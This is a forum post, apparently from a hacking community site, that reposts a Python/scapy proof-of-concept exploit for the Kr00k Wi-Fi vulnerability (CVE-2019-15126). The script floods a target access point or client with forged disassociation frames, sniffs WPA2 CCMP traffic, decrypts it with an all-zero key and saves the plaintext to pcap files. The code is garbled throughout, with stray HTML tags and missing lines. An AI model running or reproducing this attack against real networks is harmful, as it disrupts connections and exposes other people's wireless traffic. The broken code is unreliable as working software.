Jump to content
This Wind

Broadcom Wi-Fi设备-(KR00K)信息泄露漏洞

Recommended Posts

发布内容作者:Maurizio S                                             漏洞危害等级:critlow_2.gif〔中等〕



# Kr00ker<font></font>
# Experimetal KR00K PoC in python3 using scapy<font></font>
# Description:<font></font>
# This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), <font></font>
# that allows to decrypt some WPA2 CCMP data in vulnerable devices.<font></font>
# More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning:<font></font>
# * the TK (128 bites all zero) <font></font>
# * the Nonce (sent plaintext in packet header)<font></font>
# * the Encrypted Data<font></font>
# Where:<font></font>
# * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data  <font></font>
# * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00"<font></font>
# * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes)<font></font>
# This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs.<font></font>
# References:<font></font>
# https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf<font></font>
# Copyright (C) 2020   Maurizio Siddu<font></font>
# This program is free software: you can redistribute it and/or modify<font></font>
# it under the terms of the GNU General Public License as published by<font></font>
# the Free Software Foundation, either version 3 of the License, or<font></font>
# (at your option) any later version.<font></font>
# This program is distributed in the hope that it will be useful,<font></font>
# but WITHOUT ANY WARRANTY; without even the implied warranty of<font></font>
# GNU General Public License for more details.<font></font>
# You should have received a copy of the GNU General Public License<font></font>
# along with this program.  If not, see <http://www.gnu.org/licenses/><font></font>
import argparse, threading <font></font>
import datetime, sys, re<font></font>
from scapy.all import *<font></font>
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth<font></font>
from Cryptodome.Cipher import AES<font></font>
# Proof of Sympathy ;-)<font></font>
LOGO = """\<font></font>
 __ _  ____   __    __  __ _  ____  ____ <font></font>
(  / )(  _ \ /  \  /  \(  / )(  __)(  _ \\<font></font>
 )  (  )   /(  0 )(  0 ))  (  ) _)  )   /<font></font>
(__\_)(__\_) \__/  \__/(__\_)(____)(__\_)<font></font>
KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00'<font></font>
class Krooker:<font></font>
    # Define Krooker class<font></font>
    def __init__(self, interface, target_mac, other_mac, reason, num, delay):<font></font>
        self.interface = interface<font></font>
        self.target_mac = target_mac<font></font>
        self.other_mac = other_mac<font></font>
        self.reason = reason<font></font>
        self.num = num<font></font>
        self.delay = delay<font></font>
    def wpa2_decrypt(self, enc_pkt):<font></font>
        # Try to decrypt the data contained in the sniffed packet<font></font>
        t_key = bytes.fromhex("00000000000000000000000000000000")<font></font>
        # This check is redundant<font></font>
        if not enc_pkt.haslayer(Dot11CCMP):<font></font>
            return None<font></font>
        dot11 = enc_pkt[Dot11]<font></font>
        dot11ccmp = enc_pkt[Dot11CCMP]<font></font>
        # Extract the Packet Number (IV)<font></font>
        PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0)<font></font>
        # Extract the victim MAC address<font></font>
        source_addr = re.sub(':','',dot11.addr2)<font></font>
        # Extract the QoS tid<font></font>
        if enc_pkt.haslayer(Dot11QoS):<font></font>
            tid = "{:01x}".format(enc_pkt[Dot11QoS].TID)<font></font>
            tid = '0'<font></font>
        priority = tid + '0'<font></font>
        # Build the nonce<font></font>
        ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN)<font></font>
        # Finally try to decrypt wpa2 data <font></font>
        enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8)<font></font>
        decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8])<font></font>
        return decrypted_data<font></font>
    def disassociate(self):<font></font>
        # Forge the dot11 disassociation packet<font></font>
        dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)<font></font>
        # Loop to send the disassociation packets to the victim device<font></font>
        while True:<font></font>
            # Repeat every delay value seconds<font></font>
            print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)<font></font>
            sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)<font></font>
    def check_packet(self, sniffed_pkt):<font></font>
        # Filter for WPA2 AES CCMP packets containing data to decrypt<font></font>
        if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP):<font></font>
            #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype))<font></font>
            # Decrypt the packets using the all zero temporary key<font></font>
            dec_data = self.wpa2_decrypt(sniffed_pkt)<font></font>
            # Check if the target is vulnerable<font></font>
            if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN:<font></font>
                print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes")<font></font>
                # Save the encrypted and decrypted packets<font></font>
                print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder")<font></font>
                dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:]<font></font>
                wrpcap("enc_pkts.pcap", sniffed_pkt, append=True)<font></font>
                wrpcap("dec_pkts.pcap", dec_pkt, append=True)<font></font>
                # Uncomment this if you need a one-shoot PoC decryption <font></font>
                #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong")<font></font>
    def run_disassociation(self):<font></font>
        # Run disassociate function in a background thread<font></font>
        except KeyboardInterrupt:<font></font>
            print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")<font></font>
def main():<font></font>
    # Passing arguments<font></font>
    parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w <wifi-channel> -d <delay>")<font></font>
    parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str)<font></font>
    parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str)<font></font>
    parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str)<font></font>
    parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1)<font></font>
    parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0)<font></font>
    parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap")<font></font>
    parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1")<font></font>
    parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4")<font></font>
    args = parser.parse_args()<font></font>
    # Print the kr00ker logo<font></font>
    # Start the fun!!<font></font>
        interface = args.interface<font></font>
        ap_mac = args.bssid.lower()<font></font>
        client_mac = args.client.lower()<font></font>
        reason = args.reason<font></font>
        target_channel = args.wifi_channel<font></font>
        n_pkts = args.number<font></font>
        delay = args.delay<font></font>
        # Set the selected channel<font></font>
        if target_channel in range(1, 14):<font></font>
            os.system("iwconfig " + interface + " channel " + str(target_channel))<font></font>
            print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid")<font></font>
        # Check if valid device MAC Addresses have been specified<font></font>
        if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff":<font></font>
            print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid")<font></font>
        # Check if a valid reason have been specified<font></font>
        if reason not in range(1,99):<font></font>
            print("Exiting, specified a not valid disassociation Reason ID: "+str(reason))<font></font>
        # Set the MAC address of the target<font></font>
        if args.target == "client":<font></font>
            target_mac = client_mac<font></font>
            other_mac = ap_mac<font></font>
            print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target")<font></font>
            target_mac = ap_mac<font></font>
            other_mac = client_mac<font></font>
            print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target")<font></font>
        # Krooker instance initialization<font></font>
        krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay)<font></font>
        # Start a background thread to send disassociation packets<font></font>
        k_th = threading.Thread(target=krooker.run_disassociation)<font></font>
        k_th.daemon = True    # This does not seem to be useful<font></font>
        # Start packet interception<font></font>
        s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data"<font></font>
        sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet)    <font></font>
    except KeyboardInterrupt:<font></font>
        print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")<font></font>
    except scapy.error.Scapy_Exception:<font></font>
        print("["+str(datetime.now().time())+"][!] Exiting, your wireless interface seems not in monitor mode")<font></font>
if __name__ == "__main__":<font></font>
#  [2020-03-20]  #


Link to post
Share on other sites


Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.



Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!


Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project



黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com


  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines